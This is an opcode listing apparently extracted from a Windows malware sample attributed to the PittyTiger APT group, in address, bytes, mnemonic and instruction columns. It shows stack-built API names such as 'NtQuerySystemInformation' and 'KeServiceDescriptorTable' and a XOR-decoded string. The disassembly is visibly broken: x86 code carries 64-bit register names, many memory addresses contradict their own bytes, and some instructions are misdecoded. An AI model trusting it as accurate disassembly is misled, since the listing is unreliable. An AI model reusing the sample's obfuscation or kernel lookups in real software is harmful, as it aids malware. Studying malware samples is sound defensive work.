# Opcode extraction for malware analysis
# APT Group: 02 PITTYTIGER (MITRE ID G0011)
# Malware Hash: b221e172fdf3c40e2bef10e9e95da7a48a556dfce6a20fda7279cbdd872cae2a
# Executable format: Portable Executable (PE)
# Processor: x86
# Creation date: Sun Nov 03 21:09:59 EST 2024
# Format: <Address> | <Bytes> | <Mnemonic> | <Full Instruction>

00401000 | 55 | PUSH | PUSH RBP
00401001 | 8b ec | MOV | MOV EBP,ESP
00401003 | 83 ec 64 | SUB | SUB ESP,0x64
00401006 | 53 | PUSH | PUSH RBX
00401007 | 56 | PUSH | PUSH RSI
00401008 | 57 | PUSH | PUSH RDI
00401009 | 33 c0 | XOR | XOR EAX,EAX
0040100b | 8d 7d e9 | LEA | LEA EDI,[RBP + -0x17]
0040100e | 33 db | XOR | XOR EBX,EBX
00401010 | ab | STOSD | STOSD RDI
00401011 | ab | STOSD | STOSD RDI
00401012 | ab | STOSD | STOSD RDI
00401013 | ab | STOSD | STOSD RDI
00401014 | 66 ab | STOSW | STOSW RDI
00401016 | aa | STOSB | STOSB RDI
00401017 | 33 c0 | XOR | XOR EAX,EAX
00401019 | 8d 7d d5 | LEA | LEA EDI,[RBP + -0x2b]
0040101c | 88 5d d4 | MOV | MOV byte ptr [RBP + -0x2c],BL
0040101f | 6a 06 | PUSH | PUSH 0x6
00401021 | ab | STOSD | STOSD RDI
00401022 | ab | STOSD | STOSD RDI
00401023 | ab | STOSD | STOSD RDI
00401024 | ab | STOSD | STOSD RDI
00401025 | 66 ab | STOSW | STOSW RDI
00401027 | aa | STOSB | STOSB RDI
00401028 | 59 | POP | POP RCX
00401029 | 33 c0 | XOR | XOR EAX,EAX
0040102b | 8d 7d 9d | LEA | LEA EDI,[RBP + -0x63]
0040102e | 88 5d 9c | MOV | MOV byte ptr [RBP + -0x64],BL
00401031 | f3 ab | STOSD.REP | STOSD.REP RDI
00401033 | aa | STOSB | STOSB RDI
00401034 | 6a 06 | PUSH | PUSH 0x6
00401036 | 33 c0 | XOR | XOR EAX,EAX
00401038 | 59 | POP | POP RCX
00401039 | 8d 7d b9 | LEA | LEA EDI,[RBP + -0x47]
0040103c | 88 5d b8 | MOV | MOV byte ptr [RBP + -0x48],BL
0040103f | c7 05 dc be 40 00 4e 74 51 75 | MOV | MOV dword ptr [0x0080cf25],0x7551744e
00401049 | f3 ab | STOSD.REP | STOSD.REP RDI
0040104b | aa | STOSB | STOSB RDI
0040104c | c7 05 e0 be 40 00 65 72 79 53 | MOV | MOV dword ptr [0x0080cf36],0x53797265
00401056 | c7 05 e4 be 40 00 79 73 74 65 | MOV | MOV dword ptr [0x0080cf44],0x65747379
00401060 | c7 05 e8 be 40 00 6d 49 6e 66 | MOV | MOV dword ptr [0x0080cf52],0x666e496d
0040106a | c7 05 ec be 40 00 6f 72 6d 61 | MOV | MOV dword ptr [0x0080cf60],0x616d726f
00401074 | c7 05 f0 be 40 00 74 69 6f 6e | MOV | MOV dword ptr [0x0080cf6e],0x6e6f6974
0040107e | 88 1d f4 be 40 00 | MOV | MOV byte ptr [0x0080cf78],BL
00401084 | c7 05 dc bd 40 00 4b 65 53 65 | MOV | MOV dword ptr [0x0080ce6a],0x6553654b
0040108e | c7 05 e0 bd 40 00 72 76 69 63 | MOV | MOV dword ptr [0x0080ce78],0x63697672
00401098 | c7 05 e4 bd 40 00 65 44 65 73 | MOV | MOV dword ptr [0x0080ce86],0x73654465
004010a2 | c7 05 e8 bd 40 00 63 72 69 70 | MOV | MOV dword ptr [0x0080ce94],0x70697263
004010ac | c7 05 ec bd 40 00 74 6f 72 54 | MOV | MOV dword ptr [0x0080cea2],0x54726f74
004010b6 | c7 05 f0 bd 40 00 61 62 6c 65 | MOV | MOV dword ptr [0x0080ceb0],0x656c6261
004010c0 | 88 1d f4 bd 40 00 | MOV | MOV byte ptr [0x0080ceba],BL
004010c6 | c7 05 dc bf 40 00 6e 74 64 6c | MOV | MOV dword ptr [0x0080d0ac],0x6c64746e
004010d0 | c7 05 e0 bf 40 00 6c 2e 64 6c | MOV | MOV dword ptr [0x0080d0ba],0x6c642e6c
004010da | c7 05 e4 bf 40 00 6c 00 cc cc | MOV | MOV dword ptr [0x0080d0c8],0xcccc006c
004010e4 | c7 45 e8 be 9f 6d 6c | MOV | MOV dword ptr [RBP + -0x18],0x6c6d9fbe
004010eb | c7 45 ec f5 d8 bc 2b | MOV | MOV dword ptr [RBP + -0x14],0x2bbcd8f5
004010f2 | c7 45 f0 77 0b 0e ba | MOV | MOV dword ptr [RBP + -0x10],0xba0e0b77
004010f9 | 90 | NOP | NOP
004010fa | 81 75 e8 f5 fa 1f 02 | XOR | XOR dword ptr [RBP + -0x18],0x21ffaf5
00401101 | 81 75 ec 90 b4 8f 19 | XOR | XOR dword ptr [RBP + -0x14],0x198fb490
00401108 | 81 75 f0 59 6f 62 d6 | XOR | XOR dword ptr [RBP + -0x10],0xd6626f59
0040110f | 88 5d f4 | MOV | MOV byte ptr [RBP + -0xc],BL
00401112 | 50 | PUSH | PUSH RAX
00401113 | 8d 85 d4 ff ff ff | LEA | LEA EAX,[RBP + -0x2c]
00401119 | c6 00 41 | MOV | MOV byte ptr [RAX],0x41
0040111c | c6 40 01 64 | MOV | MOV byte ptr [RAX + 0x1],0x64
00401120 | c6 40 02 76 | MOV | MOV byte ptr [RAX + 0x2],0x76
00401124 | c6 40 03 61 | MOV | MOV byte ptr [RAX + 0x3],0x61
00401128 | c6 40 04 70 | MOV | MOV byte ptr [RAX + 0x4],0x70
0040112c | c6 40 05 69 | MOV | MOV byte ptr [RAX + 0x5],0x69
00401130 | c6 40 06 33 | MOV | MOV byte ptr [RAX + 0x6],0x33
00401134 | c6 40 07 32 | MOV | MOV byte ptr [RAX + 0x7],0x32
00401138 | c6 40 08 2e | MOV | MOV byte ptr [RAX + 0x8],0x2e
0040113c | c6 40 09 64 | MOV | MOV byte ptr [RAX + 0x9],0x64
00401140 | c6 40 0a 6c | MOV | MOV byte ptr [RAX + 0xa],0x6c
00401144 | c6 40 0b 6c | MOV | MOV byte ptr [RAX + 0xb],0x6c
00401148 | c6 40 0c 00 | MOV | MOV byte ptr [RAX + 0xc],0x0
0040114c | 58 | POP | POP RAX
0040114d | 8b 35 0c 70 40 00 | MOV | MOV ESI,dword ptr [0x0080815f]
00401153 | 8d 45 e8 | LEA | LEA EAX,[RBP + -0x18]
00401156 | 50 | PUSH | PUSH RAX
00401157 | ff d6 | CALL | CALL RSI
00401159 | 8b f8 | MOV | MOV EDI,EAX
0040115b | 8d 45 d4 | LEA | LEA EAX,[RBP + -0x2c]
0040115e | 50 | PUSH | PUSH RAX
0040115f | ff d6 | CALL | CALL RSI
00401161 | 8b 35 08 70 40 00 | MOV | MOV ESI,dword ptr [0x0080816f]
00401167 | 89 45 fc | MOV | MOV dword ptr [RBP + -0x4],EAX
0040116a | 8d 45 9c | LEA | LEA EAX,[RBP + -0x64]
0040116d | c7 45 a4 41 75 65 45 | MOV | MOV dword ptr [RBP + -0x5c],0x45657541
00401174 | 50 | PUSH | PUSH RAX
00401175 | 57 | PUSH | PUSH RDI
00401176 | c7 45 9c 43 6f 70 79 | MOV | MOV dword ptr [RBP + -0x64],0x79706f43
0040117d | c7 45 a0 46 69 6c 65 | MOV | MOV dword ptr [RBP + -0x60],0x656c6946
00401184 | 88 5d a5 | MOV | MOV byte ptr [RBP + -0x5b],BL
00401187 | ff d6 | CALL | CALL RSI
00401189 | a3 d4 bd 40 00 3b c3 75 07 | MOV | MOV [0x775c33b0040bdd4],EAX
00401192 | 33 c0 | XOR | XOR EAX,EAX
00401194 | e9 b7 03 00 00 | JMP | JMP 0x00401550
00401550 | 5f | POP | POP RDI
00401551 | 5e | POP | POP RSI
00401552 | 5b | POP | POP RBX
00401553 | c9 | LEAVE | LEAVE
00401554 | c3 | RET | RET
0040279c | 55 | PUSH | PUSH RBP
0040279d | 8b ec | MOV | MOV EBP,ESP
0040279f | 6a ff | PUSH | PUSH -0x1
004027a1 | 68 48 71 40 00 | PUSH | PUSH 0x407148
004027a6 | 68 38 36 40 00 | PUSH | PUSH 0x403638
004027ab | 64 a1 00 00 00 00 50 64 89 25 | MOV | MOV EAX,FS:[0x2589645000000000]
004027b5 | 00 00 | ADD | ADD byte ptr [RAX],AL
004027b7 | 00 00 | ADD | ADD byte ptr [RAX],AL
004027b9 | 83 ec 58 | SUB | SUB ESP,0x58
004027bc | 53 | PUSH | PUSH RBX
004027bd | 56 | PUSH | PUSH RSI
004027be | 57 | PUSH | PUSH RDI
004027bf | 89 65 e8 | MOV | MOV dword ptr [RBP + -0x18],ESP
004027c2 | ff 15 94 70 40 00 | CALL | CALL qword ptr [0x0080985c]
004027c8 | 33 d2 | XOR | XOR EDX,EDX
004027ca | 8a d4 | MOV | MOV DL,AH
004027cc | 89 15 78 c0 50 00 | MOV | MOV dword ptr [0x0090e84a],EDX
004027d2 | 8b c8 | MOV | MOV ECX,EAX
004027d4 | 81 e1 ff 00 00 00 | AND | AND ECX,0xff
004027da | 89 0d 74 c0 50 00 | MOV | MOV dword ptr [0x0090e854],ECX
004027e0 | c1 e1 08 | SHL | SHL ECX,0x8
004027e3 | 03 ca | ADD | ADD ECX,EDX
004027e5 | 89 0d 70 c0 50 00 | MOV | MOV dword ptr [0x0090e85b],ECX
004027eb | c1 e8 10 | SHR | SHR EAX,0x10
004027ee | a3 6c c0 50 00 6a 01 e8 e9 | MOV | MOV [0xe9e8016a0050c06c],EAX
004027f7 | 0c 00 | OR | OR AL,0x0
004027f9 | 00 59 85 | ADD | ADD byte ptr [RCX + -0x7b],BL
004027fc | c0 75 08 6a | SHL | SHL byte ptr [RBP + 0x8],0x6a
00402800 | 1c e8 | SBB | SBB AL,0xe8
00402802 | c3 | RET | RET
00403540 | 55 | PUSH | PUSH RBP
00403541 | 8b ec | MOV | MOV EBP,ESP
00403543 | 53 | PUSH | PUSH RBX
00403544 | 56 | PUSH | PUSH RSI
00403545 | 57 | PUSH | PUSH RDI
00403546 | 55 | PUSH | PUSH RBP
00403547 | 6a 00 | PUSH | PUSH 0x0
00403549 | 6a 00 | PUSH | PUSH 0x0
0040354b | 68 58 35 40 00 | PUSH | PUSH 0x403558
00403550 | ff 75 08 | PUSH | PUSH qword ptr [RBP + 0x8]
00403553 | e8 8c 2c 00 00 | CALL | CALL 0x004061e4
00403558 | 5d | POP | POP RBP
00403559 | 5f | POP | POP RDI
0040355a | 5e | POP | POP RSI
0040355b | 5b | POP | POP RBX
0040355c | 8b e5 | MOV | MOV ESP,EBP
0040355e | 5d | POP | POP RBP
0040355f | c3 | RET | RET
00403560 | 8b 4c 24 04 | MOV | MOV ECX,dword ptr [RSP + 0x4]
00403564 | f7 41 04 06 00 00 00 | TEST | TEST dword ptr [RCX + 0x4],0x6
0040356b | b8 01 00 00 00 | MOV | MOV EAX,0x1
00403570 | 74 0f | JZ | JZ 0x00403581
00403572 | 8b 44 24 08 | MOV | MOV EAX,dword ptr [RSP + 0x8]
00403576 | 8b 54 24 10 | MOV | MOV EDX,dword ptr [RSP + 0x10]
0040357a | 89 02 | MOV | MOV dword ptr [RDX],EAX
0040357c | b8 03 00 00 00 | MOV | MOV EAX,0x3
00403581 | c3 | RET | RET
00403582 | 53 | PUSH | PUSH RBX
00403583 | 56 | PUSH | PUSH RSI
00403584 | 57 | PUSH | PUSH RDI
00403585 | 8b 44 24 10 | MOV | MOV EAX,dword ptr [RSP + 0x10]
00403589 | 50 | PUSH | PUSH RAX
0040358a | 6a fe | PUSH | PUSH -0x2
0040358c | 68 60 35 40 00 | PUSH | PUSH 0x403560
00403591 | 64 ff 35 00 00 00 00 | PUSH | PUSH qword ptr FS:[0x403598]
00403598 | 64 89 25 00 00 00 00 | MOV | MOV dword ptr FS:[0x40359f],ESP
0040359f | 8b 44 24 20 | MOV | MOV EAX,dword ptr [RSP + 0x20]
004035a3 | 8b 58 08 | MOV | MOV EBX,dword ptr [RAX + 0x8]
004035a6 | 8b 70 0c | MOV | MOV ESI,dword ptr [RAX + 0xc]
004035a9 | 83 fe ff | CMP | CMP ESI,-0x1
004035ac | 74 2e | JZ | JZ 0x004035dc
004035ae | 3b 74 24 24 | CMP | CMP ESI,dword ptr [RSP + 0x24]
004035b2 | 74 28 | JZ | JZ 0x004035dc
004035b4 | 8d 34 76 | LEA | LEA ESI,[RSI + RSI*0x2]
004035b7 | 8b 0c b3 | MOV | MOV ECX,dword ptr [RBX + RSI*0x4]
004035ba | 89 4c 24 08 | MOV | MOV dword ptr [RSP + 0x8],ECX
004035be | 89 48 0c | MOV | MOV dword ptr [RAX + 0xc],ECX
004035c1 | 83 7c b3 04 00 | CMP | CMP dword ptr [RBX + RSI*0x4 + 0x4],0x0
004035c6 | 75 12 | JNZ | JNZ 0x004035da
004035c8 | 68 01 01 00 00 | PUSH | PUSH 0x101
004035cd | 8b 44 b3 08 | MOV | MOV EAX,dword ptr [RBX + RSI*0x4 + 0x8]
004035d1 | e8 40 00 00 00 | CALL | CALL 0x00403616
004035d6 | ff 54 b3 08 | CALL | CALL qword ptr [RBX + RSI*0x4 + 0x8]
004035da | eb c3 | JMP | JMP 0x0040359f
004035dc | 64 8f 05 00 00 00 00 | POP | POP qword ptr FS:[0x4035e3]
004035e3 | 83 c4 0c | ADD | ADD ESP,0xc
004035e6 | 5f | POP | POP RDI
004035e7 | 5e | POP | POP RSI
004035e8 | 5b | POP | POP RBX
004035e9 | c3 | RET | RET
00403616 | 53 | PUSH | PUSH RBX
00403617 | 51 | PUSH | PUSH RCX
00403618 | bb 34 84 40 00 | MOV | MOV EBX,0x408434
0040361d | 8b 4d 08 | MOV | MOV ECX,dword ptr [RBP + 0x8]
00403620 | 89 4b 08 | MOV | MOV dword ptr [RBX + 0x8],ECX
00403623 | 89 43 04 | MOV | MOV dword ptr [RBX + 0x4],EAX
00403626 | 89 6b 0c | MOV | MOV dword ptr [RBX + 0xc],EBP
00403629 | 59 | POP | POP RCX
0040362a | 5b | POP | POP RBX
0040362b | c2 04 00 | RET | RET 0x4
00403638 | 55 | PUSH | PUSH RBP
00403639 | 8b ec | MOV | MOV EBP,ESP
0040363b | 83 ec 08 | SUB | SUB ESP,0x8
0040363e | 53 | PUSH | PUSH RBX
0040363f | 56 | PUSH | PUSH RSI
00403640 | 57 | PUSH | PUSH RDI
00403641 | 55 | PUSH | PUSH RBP
00403642 | fc | CLD | CLD
00403643 | 8b 5d 0c | MOV | MOV EBX,dword ptr [RBP + 0xc]
00403646 | 8b 45 08 | MOV | MOV EAX,dword ptr [RBP + 0x8]
00403649 | f7 40 04 06 00 00 00 | TEST | TEST dword ptr [RAX + 0x4],0x6
00403650 | 0f 85 82 00 00 00 | JNZ | JNZ 0x004036d8
00403656 | 89 45 f8 | MOV | MOV dword ptr [RBP + -0x8],EAX
00403659 | 8b 45 10 | MOV | MOV EAX,dword ptr [RBP + 0x10]
0040365c | 89 45 fc | MOV | MOV dword ptr [RBP + -0x4],EAX
0040365f | 8d 45 f8 | LEA | LEA EAX,[RBP + -0x8]
00403662 | 89 43 fc | MOV | MOV dword ptr [RBX + -0x4],EAX
00403665 | 8b 73 0c | MOV | MOV ESI,dword ptr [RBX + 0xc]
00403668 | 8b 7b 08 | MOV | MOV EDI,dword ptr [RBX + 0x8]
0040366b | 83 fe ff | CMP | CMP ESI,-0x1
0040366e | 74 61 | JZ | JZ 0x004036d1
00403670 | 8d 0c 76 | LEA | LEA ECX,[RSI + RSI*0x2]
00403673 | 83 7c 8f 04 00 | CMP | CMP dword ptr [RDI + RCX*0x4 + 0x4],0x0
00403678 | 74 45 | JZ | JZ 0x004036bf
0040367a | 56 | PUSH | PUSH RSI
0040367b | 55 | PUSH | PUSH RBP
0040367c | 8d 6b 10 | LEA | LEA EBP,[RBX + 0x10]
0040367f | ff 54 8f 04 | CALL | CALL qword ptr [RDI + RCX*0x4 + 0x4]
00403683 | 5d | POP | POP RBP
00403684 | 5e | POP | POP RSI
00403685 | 8b 5d 0c | MOV | MOV EBX,dword ptr [RBP + 0xc]
00403688 | 0b c0 | OR | OR EAX,EAX
0040368a | 74 33 | JZ | JZ 0x004036bf
0040368c | 78 3c | JS | JS 0x004036ca
0040368e | 8b 7b 08 | MOV | MOV EDI,dword ptr [RBX + 0x8]
00403691 | 53 | PUSH | PUSH RBX
00403692 | e8 a9 fe ff ff | CALL | CALL 0x00403540
00403697 | 83 c4 04 | ADD | ADD ESP,0x4
0040369a | 8d 6b 10 | LEA | LEA EBP,[RBX + 0x10]
0040369d | 56 | PUSH | PUSH RSI
0040369e | 53 | PUSH | PUSH RBX
0040369f | e8 de fe ff ff | CALL | CALL 0x00403582
004036a4 | 83 c4 08 | ADD | ADD ESP,0x8
004036a7 | 8d 0c 76 | LEA | LEA ECX,[RSI + RSI*0x2]
004036aa | 6a 01 | PUSH | PUSH 0x1
004036ac | 8b 44 8f 08 | MOV | MOV EAX,dword ptr [RDI + RCX*0x4 + 0x8]
004036b0 | e8 61 ff ff ff | CALL | CALL 0x00403616
004036b5 | 8b 04 8f | MOV | MOV EAX,dword ptr [RDI + RCX*0x4]
004036b8 | 89 43 0c | MOV | MOV dword ptr [RBX + 0xc],EAX
004036bb | ff 54 8f 08 | CALL | CALL qword ptr [RDI + RCX*0x4 + 0x8]
004036bf | 8b 7b 08 | MOV | MOV EDI,dword ptr [RBX + 0x8]
004036c2 | 8d 0c 76 | LEA | LEA ECX,[RSI + RSI*0x2]
004036c5 | 8b 34 8f | MOV | MOV ESI,dword ptr [RDI + RCX*0x4]
004036c8 | eb a1 | JMP | JMP 0x0040366b
004036ca | b8 00 00 00 00 | MOV | MOV EAX,0x0
004036cf | eb 1c | JMP | JMP 0x004036ed
004036d1 | b8 01 00 00 00 | MOV | MOV EAX,0x1
004036d6 | eb 15 | JMP | JMP 0x004036ed
004036d8 | 55 | PUSH | PUSH RBP
004036d9 | 8d 6b 10 | LEA | LEA EBP,[RBX + 0x10]
004036dc | 6a ff | PUSH | PUSH -0x1
004036de | 53 | PUSH | PUSH RBX
004036df | e8 9e fe ff ff | CALL | CALL 0x00403582
004036e4 | 83 c4 08 | ADD | ADD ESP,0x8
004036e7 | 5d | POP | POP RBP
004036e8 | b8 01 00 00 00 | MOV | MOV EAX,0x1
004036ed | 5d | POP | POP RBP
004036ee | 5f | POP | POP RDI
004036ef | 5e | POP | POP RSI
004036f0 | 5b | POP | POP RBX
004036f1 | 8b e5 | MOV | MOV ESP,EBP
004036f3 | 5d | POP | POP RBP
004036f4 | c3 | RET | RET
004061e4 | ff 25 e4 70 40 00 | JMP | JMP qword ptr [0x0080d2ce]
